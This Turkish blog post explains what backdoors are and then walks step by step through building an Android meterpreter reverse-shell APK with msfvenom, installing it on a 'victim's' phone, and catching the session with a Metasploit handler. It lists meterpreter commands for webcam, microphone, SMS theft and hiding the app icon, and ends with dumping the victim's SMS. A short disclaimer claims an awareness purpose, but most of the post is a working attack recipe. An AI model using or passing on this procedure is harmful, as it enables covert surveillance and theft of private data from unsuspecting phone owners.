Ana içeriğe atla

BackDoor Saldırısı Nedir, Nasıl yapılır?

Tanımı  Arka kapı ne anlama geliyor?


Arka kapı bir sistemin güvenlik mekanizmasının, sistemin verilerine erişmek için algılanamayan bir şekilde atlatıldığı bir tekniktir.
Arka kapı erişim yöntemi bazen programı geliştiren bir programcı tarafından yazılır. Bazende kötü niyetli Hackerlar tarafından sistemin herhangi bir güvenlik açığı kullanılarak sisteme yerleştirilebilir. Günümüzde popüler olarak bilinen bir kaç farklı yöntem olmakla birlikte temel düzey hacker'ların severek kullandığı msfvenom isimli bir araç mevcut.  Özellikle Windows PC ve Android tabanlı işletim sistemlerinde backdoor uygulamaları (APK ve EXE) oluşturmaya yarıyor. Oluşturulan bu uygulamalar kullanıcıların cihazlarına genellikle reklamlarda zorla indirilerek veya farklı bir uygulamaymış gibi gösterilerek kurduruyor. Hiç bir şeyden haberi olmayan cihaz kullanıcısı tüm mahremini kötü niyetli kişilere haberi olmadan açıyor bunlar;

Telefon veya PC için;
-Ortam sesi dinlemek, Kayıt almak
-Anlık Ekran Fotoğrafı çekebilmek, izlemek
-Şifreler ve sosyal medya hesapları
-Kamera izlemek,kayıt altına almak
-Tarayıcı geçmişi
-SMS,WhatsApp mesajları
-Sizin adınıza sms göndermek
-Arama Kayıtları
-Medya içerikleri

Şeklinde sıralanabilir. Neyse ki güncel antivirüs yazılımları ve güncel işletim sistemleri bunların üstesinden geliyor ve engellemeyi çoğunlukla başarıyor. Ancak yinede dikkatli olmakta fayda var.

Peki normal basit düzey bir kullanıcı kolaylıkla bir Hacker'a dönüşebilir mi??
Bu sorunun cevabı EVET, Bu yazı dizisinde bir android telefonda nasıl BackDoor açabileceğinizi  anlatacağım.

Burada anlatılan işlemlerin kullanılması sonucunda doğacak hukuki süreçler tamamen işlemi yapan kişiye aittir. Bu anlatımın nedeni Türkiye'de Siber farkındalık oluşturmak ve kullanıcıların kendisini korumaları gerektiğini ispatlamak içindir. 

İhtiyaç Listesi

-LİNUX tabanlı bir işletim sistemi yüklü PC, Sanal PC kurulumu da yapabilirsiniz. Tavsiyem KALİ LİNUX kurulmasıdır.
- İnternet Bağlantısı
-Öğrenme İsteği.


1) Kali Linux Cihazımızı açtıktan sonra masaüstünden Terminali çalıştırın.
2) msfvenom   yazın ve enter tuşuna basın.
3)

 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444R > /root/Desktop/android.apk

 LHOST yerine kendi yerel ip adresinizi yazacaksınız.
Öğrenmek için Windows PC'de
windows+R tuşuna basarak ipconfig yazabilirsiniz.
 örn: IPv4 Address. . . . . . . . . . . : 192.168.1.105
Yerel Ağda çalışacağımız için port yerine 4444 yazmanız yeterli. Modemde yönlendirme yapmaya gerek yok.
Bu işlemden sonra içerisinde Virüs bulunan apk dosyamızı oluşturmuş bulunmaktayız. oluşturduğumuz bu dosyayı kurban kişisinin telefonuna yüklemeniz yeterlidir.  2. adımda Oluşturduğumuz virüse bağlanacağız.

Terminali tekrar açalım. Sırası ile
 msfconsole  yazalım


2
3
4
5
6
7
8
9
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.189.105
LHOST => 192.168.189.105
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

Artık Dinleme işlemine geçtik.
ekrana help yazarak yapabileceklerimizi görebiliriz. Bunlar;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
meterpreter > help
Core Commands
=============
    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel
Stdapi: File system Commands
============================
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory
Stdapi: Networking Commands
===========================
    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table
Stdapi: System Commands
=======================
    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
    Command       Description
    -------       -----------
    screenshot    Grab a screenshot of the interactive desktop
Stdapi: Webcam Commands
=======================
    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam
Android Commands
================
    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information

Örnek olarak Kurbanımızın SMSlerini okumak için ekrana yazmamız gereken kod:
dump_sms
Ve tüm sms gelen kutusunu kopyalamış oluyoruz.

Siber alanda kendinizi korumanız dileği ile..


Etiketler:

Bu blogdaki popüler yayınlar

7 Segment Display Nasıl Çalışır?

Bir deney ile sizlere bunu açıklayacağım. Deneyde Kullanılan Araçlar: ·         Multimetre ·         100 ohm Direnç x 7 ·         7447 Entegre ·         Breadboard ·         Güç Kaynağı ·         Bağlantı Kabloları ·         7 Parçalı gösterge Deneyin Amacı: 1.       7447 Entegresinin Kurulması, çalıştırılması,pin numaralarının öğrenilmesi. 2.       7 parçalı gösterge çalışma mantığı 3.       7 parçalı göstergenin pin numaralarının öğrenilmesi Devre Şeması: Devre Şemasının Proteus Çizimi: Dikkat: Proteusda 7447 Entegresinin toprak ve power (V0) Bağlantıları otomatik olarak yapılmıştır.  Ve 1-2-6-7 numaralı bacaklara lojik 0 değeri verilmiştir. Deney Hakkında Bilgiler ve Deneyin yapılışı 7 segment LED   ( 7-parçalı sayısal LED )   Nedir: 7 segment LED (7-parçalı sayısal LED) gösterge en yaygın sayısal gösterge biçimlerinden biridir. Yedi çubuk parça 8 oluştura
Devamı

Siemens S71200 Programlamaya Giriş Notları(1)

MÜHENDİSİN NOT DEFTERİ... DERS NOTU ŞEKLİNDEDİR, DÜZENLENECEKTİR. S71214 DCDCDC 1M bacağına 0 V verirseniz diğer girişleri tetiklemek için +24V kullanmalıyız. Analog girişler 0-10V arasında tetikenmelidir. Transistörlü PLC lerde çıkışlar +24V Q0.0 dan başlayarak adresleme yapılmaktadır. Profinet standart. Tüm ethernet kullanan sistemlerle kullanabilirsiniz. Memori kart sayesinde plc işlemlerini kayıt edebilirsiniz. Ortasında bulunan kapak içerisinde signal boardlar mevcut. Direk bağlantı yapılabilir. ÖRN: thermocouple. Haberleşme modulleri sol tarafa monte edilebilir. Örn RS485 Ray üzerine montaj yapılırken modülleri önceden monte etmek kolaylık sağlar. GSM-GPRS Modülü ile sms vb kontroller yapılabilir, Sim Kart ihtiyacı var. Sağ tarafa Thermocouple vb modül bağlantısı yaparken ray'a takarak tornavida yardımı ile konnektörü dışarı çıkarabilir. Tırnaklı bir yapısı var. (ilginç :)) CPU değişeceği zaman konektörler kolaylıkla tırnaklar yardımı ile ayrılabilir.  Sa
Devamı

3D YAZICI PRUSA İ3 STEEL YAPIYORUZ (P3Steel)

1.Bölüm Malzeme Alırken dikkat etmeniz gereken noktalar ve maliyeti düşük yazıcılar toplamak için yukarıda bulunan video'yu izleyiniz. 3D Yazıcı Temel Bilgiler 3D yazıcı, 3 boyut da zemin üzerine kat kat çıkarak boşlukta 3D çizimleri oluşturan bir çeşit CNC Tezgahtır.  Bilgisayarda tasarlanan nesneleri aynı bir cnc gibi işler. Öncelikle çizim repetier programında katmanlara ayrılır. Yazıcı çizilen nesneyi katman katman alt tablaya plastik akıtarak yapar. Her bir katman üst üste gelerek çizime yükseklik verir 3. boyut kazandırılır.  Yazıcıların kartuşları filament olarak tanımlanır.Bir ipe benzeyen sert çubuk şeklinde filament rulo şeklinde satılmaktadır. PLA ve ABS en temel filament çeşitleridir. PLA doğaldır. Piyasada genellikle kg olarak satılır. Hazır olarak satılan bir çok model olmasına karşılık, OpenSource olarak nitelendirilen reprap 3 boyutlu yazıcılarda mevcut. Open Source kavramı dilimize açık kaynak kodlu olarak yerleşmiştir yani 3 boy
Devamı